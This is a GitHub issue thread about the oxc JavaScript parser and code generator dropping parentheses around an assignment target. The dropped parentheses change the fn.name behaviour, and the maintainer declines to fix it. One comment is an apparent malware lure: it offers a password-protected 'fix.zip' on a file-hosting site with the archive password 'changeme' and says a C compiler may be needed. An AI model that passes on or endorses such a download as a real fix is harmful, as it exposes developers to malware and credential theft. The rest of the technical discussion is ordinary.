### ISSUE TITLE
Parser/Codegen: should preserve parentheses around assignment target

### ISSUE THREAD

**Issue by KermanX** [oxc-project/oxc#6154]
## Current Behavior
[Playground link](https://playground.oxc.rs/#eNo9jssNgzAMhldBPhWJCah67RRcQurQSImN7ABFiN0bEOHk/2F99gYWWpiNVI6eHXX0cFRXr8pNZJNnetTVtucCGmBoN5CJjqErJfODNsmEDQRPqWi1POJt1thzKC6JIXUsEVpnguLewGhEUTIx64NS9L1aAssfHPC4nU305J0/q1zEUVD1YjawfH1CHY3NX1xRNDSEYk8YJeHwDrwciBmlZ737ff8Dh1hhcQ==)

```js
var fn;
(fn) = function() {};
```
The AST doesn't preserve the parentheses in `(fn)`, which causes the codegen generates:
```js
var fn;
fn = function() {};
```

Which has different runtime behavior: in the original code, `fn.name` is an empty string, but in the generated code, `fn.name` is `"fn"`. Run [this playground](https://www.typescriptlang.org/play/?#code/DYUwLgBAZgdg3AWAFDIBSwJQQLzQK4wDGYAlgPYypYDeAvokoRQM5mgB0wZA5qgEQwAhgFsQARgBcfADTQY7IaIwNksHPiKkKVCHQZMYrDl14CRIAExTpsBeeXIgA).

## Expected behavior

Parentheses around assignment target should be preserved and printed.

## Background

I encountered the problem when trying to pass this test262 case: https://github.com/tc39/test262/blob/main/test/language/expressions/assignment/fn-name-lhs-cover.js

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler

**Comment by Boshen** [comment]
https://oxc.rs/docs/learn/ecmascript/grammar.html#parenthesized-expression

Nobody uses this in the real world so I didn't spend the time fixing it. It'll be some ugly hacks in the parser and codegen ... but only to satisfy the spec?

This is a bug so I'll leave the issue open.

**Comment by Boshen** [comment]
As it turns out none of the tools (esbuild, swc, prettier, babel with prettify) preserve this semantic. I'm unwilling to implement this :-(
